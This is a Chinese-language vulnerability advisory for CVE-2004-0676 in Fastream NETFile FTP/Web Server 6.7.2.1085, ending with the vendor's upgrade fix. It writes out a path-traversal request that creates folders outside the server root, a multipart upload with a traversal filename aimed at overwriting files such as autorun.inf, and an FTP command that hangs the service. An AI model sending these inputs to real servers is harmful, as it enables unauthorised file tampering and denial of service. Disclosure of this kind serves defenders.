发布日期：2004-07-04
更新日期：2004-07-08

受影响系统：

Fastream NETFile FTP/Web Server 6.7.2.1085

不受影响系统：

Fastream NETFile FTP/Web Server 6.7.3

描述：

---

BUGTRAQ  ID: 13388
CVE(CAN) ID: CVE-2004-0676

Fastream NETFile Server是一款安全加强的FTP和WEB服务程序。

Fastream NETFile Server存在多个输入验证错误问题，远程攻击者可以利用这个漏洞绕过ROOT目录限制，破坏系统。

问题是Netfile处理两个斜杠存在问题，提交如下请求：

http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY


C:\>dir FOLDE*
Volume in drive C is W2000P
Volume Serial Number is xxxx-xxxx

Directory of C:\

07/03/2004  07:47p      <DIR>          FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
               0 File(s)              0 bytes
               1 Dir(s)     119,015,936 bytes free

Netfile允许在"command"参数中使用其他方法，可用于建立删除ROOT目录之外的文件和文件夹。

要利用上传文件漏洞，可发送如下POST请求：

-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain

THIS IS AN EXAMPLE

-----------------------------7d42c98700ea--

如果文件名类似Filename="//..//autorun.inf"，就可能导致替代系统上的文件。

另一个漏洞是FTP服务程序对'cd /////A'缺少正确处理，提交此命令可导致FTP挂起一段时间，造成拒绝服务。

<*来源：Andres Tarasco Acuna （at4r@haxorcitos.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=108904874104880&w=2
*>

建议：

---

厂商补丁：

Fastream
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

下载使用Fastream NETFile FTP/Web Server v6.7.3版本：

http://www.fastream.com/netfileserver.htm

浏览次数：3393
严重程度：0（网友投票）